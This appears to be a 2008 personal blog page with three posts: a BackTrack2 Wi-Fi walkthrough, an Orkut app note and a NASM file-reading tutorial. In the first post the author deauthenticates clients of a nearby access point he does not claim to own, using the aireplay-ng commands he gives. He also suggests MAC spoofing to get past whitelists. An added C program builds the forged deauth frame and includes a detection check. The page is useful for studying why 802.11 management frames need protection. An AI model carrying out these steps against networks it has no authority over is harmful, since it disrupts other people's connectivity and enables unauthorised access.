Truth, Computing and Fail

First run of BackTrack2

anomit | April 18, 2008

Yeah, I know BT3 Beta is doing the rounds, but when learning something I don't exactly like to walk on the bleeding edge!

The collection of tools is amazing and I don't even need to go on about it. It's the distro of choice for security professionals. The multitude of scripts and tools is vast, each grouped neatly in its category: radio analysis, OS fingerprinting, forensics and so on (heck, I don't even remember all of them).

I booted into BT2 using the live CD. I prefer the live CD in this case as I don't exactly want to mess around with my wireless settings by creating and destroying multiple VAPs. Got down straight to work and fired up airodump-ng. Found a couple of clients connected to the AP near me. Deauthed them with aireplay-ng. To make sure it was working, I called a friend over to my room, tested the deauth on his laptop, and it worked!

Ok, catch up with your breath. This is how I did it:

Created a VAP ath1 in monitor mode (madwifi driver; wifi0 is the physical Atheros device):
wlanconfig ath1 create wlandev wifi0 wlanmode monitor
I won't even explain how to start airodump-ng; it's as easy as 1-2-3.

Deauth the clients, using the MAC addresses found with airodump-ng, with aireplay-ng:
aireplay-ng -0 30 -a <access point MAC> -c <client MAC> ath1
Here -0 means deauthentication and 30 is the number of deauth rounds to send (0 means keep going until interrupted). -a is the BSSID of the access point and -c the client to kick; leave out -c and the deauth is broadcast to every client of that AP.

At this stage you can spoof the MAC address of the now disconnected client and receive the frames meant for it, or take its place on a network whose first (or only) layer of "security" is a MAC address whitelist. None of this needs a key: deauthentication frames are management frames, which the original 802.11 standard does not authenticate, so a client accepts a forged one carrying the AP's address as source. 802.11w management frame protection closes exactly this hole, but only where both AP and client support it.
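What aireplay-ng -0 actually puts on the air, as an added example that is not part of the original post or of the aircrack-ng code: the 26-byte 802.11 deauthentication frame, built from the two MAC addresses captured with airodump-ng. The function names, the reason code 7 and the duration value are this example's own choices; the sample addresses are constructed, and the frame is only built and hexdumped, never injected.

```c
/* Added example (not from the original post): the shape of one 802.11
 * deauthentication frame. It needs nothing but the client and AP MAC
 * addresses, which is why the attack above needs no key: before 802.11w
 * no field of a management frame is authenticated. */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define MAC_LEN 6
#define DEAUTH_FRAME_LEN 26      /* 24-byte MAC header + 2-byte reason code */
#define REASON_CLASS3 7          /* "class 3 frame from non-associated STA"; any code works */

static int hexval(int c) {
    if (c >= '0' && c <= '9') return c - '0';
    if (c >= 'a' && c <= 'f') return c - 'a' + 10;
    if (c >= 'A' && c <= 'F') return c - 'A' + 10;
    return -1;
}

/* Parse "aa:bb:cc:dd:ee:ff" (or with '-') into 6 bytes; 0 on success, -1 on bad input. */
int parse_mac(const char *s, uint8_t out[MAC_LEN]) {
    for (int i = 0; i < MAC_LEN; i++) {
        int hi = hexval(s[0]), lo = hexval(s[1]);
        if (hi < 0 || lo < 0) return -1;
        out[i] = (uint8_t)(hi << 4 | lo);
        s += 2;
        if (i < MAC_LEN - 1) {
            if (*s != ':' && *s != '-') return -1;
            s++;
        }
    }
    return *s == '\0' ? 0 : -1;
}

/* Build the frame into buf (at least DEAUTH_FRAME_LEN bytes); returns its length.
 * sta is the client to kick (ff:ff:ff:ff:ff:ff for "everyone", which is what
 * aireplay-ng does when -c is omitted); bssid is the AP we impersonate. */
size_t build_deauth(uint8_t *buf, const uint8_t sta[MAC_LEN],
                    const uint8_t bssid[MAC_LEN], uint16_t reason, uint16_t seq) {
    buf[0] = 0xC0;                       /* frame control: version 0, type 0 (mgmt), subtype 12 (deauth) */
    buf[1] = 0x00;                       /* flags: no To-DS/From-DS, not protected */
    buf[2] = 0x3A; buf[3] = 0x01;        /* duration/ID, little-endian 0x013A (arbitrary) */
    memcpy(buf + 4, sta, MAC_LEN);       /* addr1: receiver, the client */
    memcpy(buf + 10, bssid, MAC_LEN);    /* addr2: transmitter, spoofed as the AP */
    memcpy(buf + 16, bssid, MAC_LEN);    /* addr3: BSSID */
    buf[22] = (uint8_t)((seq & 0x0F) << 4);  /* sequence control: fragment 0, 12-bit seq */
    buf[23] = (uint8_t)(seq >> 4);
    buf[24] = (uint8_t)(reason & 0xFF);  /* body: reason code, little-endian */
    buf[25] = (uint8_t)(reason >> 8);
    return DEAUTH_FRAME_LEN;
}

/* The inverse check: reason code if buf is a deauth frame, else -1. Run over
 * captured frames and counted per BSSID, this is the core of deauth-flood detection. */
int deauth_reason(const uint8_t *buf, size_t len) {
    if (len < DEAUTH_FRAME_LEN) return -1;
    if ((buf[0] & 0xFC) != 0xC0) return -1;   /* ignore the protocol-version bits */
    return buf[24] | (buf[25] << 8);
}

int main(int argc, char **argv) {
    uint8_t sta[MAC_LEN], bssid[MAC_LEN], frame[DEAUTH_FRAME_LEN];
    /* Constructed sample addresses; pass real ones as argv[1] (client) and argv[2] (AP). */
    const char *sta_s = argc > 2 ? argv[1] : "aa:bb:cc:dd:ee:ff";
    const char *ap_s  = argc > 2 ? argv[2] : "00:11:22:33:44:55";
    if (parse_mac(sta_s, sta) || parse_mac(ap_s, bssid)) {
        fprintf(stderr, "bad MAC address\n");
        return 1;
    }
    size_t n = build_deauth(frame, sta, bssid, REASON_CLASS3, 1);
    for (size_t i = 0; i < n; i++)
        printf("%02x%c", frame[i], ((i + 1) % 8 == 0 || i + 1 == n) ? '\n' : ' ');
    printf("deauth reason code: %d\n", deauth_reason(frame, n));
    return 0;
}
```

Note the asymmetry that makes the attack cheap: nothing in the 26 bytes is derived from a secret, so any station within radio range can forge it, while the victim cannot tell it from a genuine one unless management frame protection is negotiated.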
Finally, don’t forget to check out the documentation and tutorials at aircrack-ng.org

Categories
GNU/Linux, Security, Wireless networks
Tags
aircrack, cryptography, hacking

Orkut app

anomit | April 17, 2008

Looks like Orkut has followed in Facebook's footsteps. Just logged in and I can see a ton of them. Currently trying out Music iLike. Time to show my allegiance to the '80s!

Categories
Uncategorized

Basic file operations with NASM

anomit |

This is meant for NASM on a Linux machine. First things first: everything in UNIX is a file. A device is a file, a network socket is a file, and so is nearly everything else you can imagine. An open file is referred to by a file descriptor, a small non-negative integer. Three are open when a program starts: 0 for STDIN (standard input), 1 for STDOUT (standard output) and 2 for STDERR (standard error output). Since everything is a file, you can read() and write() on any of them, provided you have the descriptor.

read(), write() and open() are among the most important syscalls in Linux; with them you can manipulate any file (provided you have the permissions). There are a few hundred of them in all, numbered in /usr/include/asm/unistd.h (or asm/unistd_32.h, depending on the headers), if you are interested. On 32-bit x86 a syscall is made by putting its number in eax and the parameters in ebx, ecx, edx, esi, edi and ebp, in that order and as many as the call takes, then executing int 80h; the result comes back in eax, and a negative value is minus the errno code. You can also call libc functions by declaring them extern (extern printf, for example) and pushing the parameters on the stack, last parameter first; in that case link with gcc instead of plain ld so libc is pulled in. To see which parameters a syscall takes, read the developer man pages: man 2 write for write(), and likewise for read(), open() or any other, with the syscall number list from the header handy.

Regarding arguments passed to the program: when the kernel starts it, the stack at _start holds, from the top down,

    argc
    argv[0]
    argv[1]
    argv[2]

and so on up to argv[argc-1], followed by a NULL and then the environment pointers.
argv[0] is the program name itself, so we can pop and discard it safely. Check argc before popping argv[1], though; with no argument that slot holds the terminating NULL.

The following is a small program in NASM that takes a filename as an argument, reads up to 8 KB from the file with a single read() and writes what it got to the screen.

section .data
bufsize equ 8192	;a constant, not a byte in memory (db cannot hold 8192)

section .bss
buf resb bufsize	;the 8 KB buffer, uninitialised

section .text
global _start

_start:
pop eax		;argc
cmp eax,2
jl no_arg	;no filename given: argv[1] would be NULL
pop ebx		;argv[0], discard
pop ebx		;argv[1], the filename
mov eax,5	;5 for open()
mov ecx,0	;O_RDONLY (2 would be O_RDWR, which fails on files you may only read)
int 80h

test eax,eax
jns file_read	;a negative eax is -errno

error:
neg eax		;-errno becomes errno
mov ebx,eax
mov eax,1
int 80h		;exit with errno as the status

no_arg:
mov eax,1
mov ebx,2
int 80h		;exit with status 2

file_read:
mov ebx,eax	;move the file descriptor
mov eax,3	;3 for read()
mov ecx,buf	;the buffer
mov edx,bufsize	;the buffer size
int 80h

test eax,eax
js error	;read() failed
jz done		;empty file, nothing to write
mov edx,eax	;bytes read becomes the count for write(); ecx still points at buf
mov eax,4	;4 for write()
mov ebx,1	;1, the STDOUT file descriptor
int 80h

done:
mov eax,1
mov ebx,0
int 80h		;exit with status 0 (there is no caller to ret to at _start)

To assemble: nasm -f elf filename.asm
To link: ld -s -o executable-name filename.o
On a 64-bit host use nasm -f elf32 and ld -m elf_i386 instead, since the program uses the 32-bit int 80h interface and registers.

To know more about the open flags (O_RDONLY and friends), the file descriptors and, for some increased masochistic behavior, the rest of the interface, start with /usr/include/unistd.h and /usr/include/fcntl.h. Poke around that directory for some more knowledge.

Categories
Coding, GNU/Linux
Tags
assembly, NASM, syscall, unix

License

This work by Anomit Ghosh is licensed under a Creative Commons Attribution-Noncommercial-Share Alike 2.5 India License.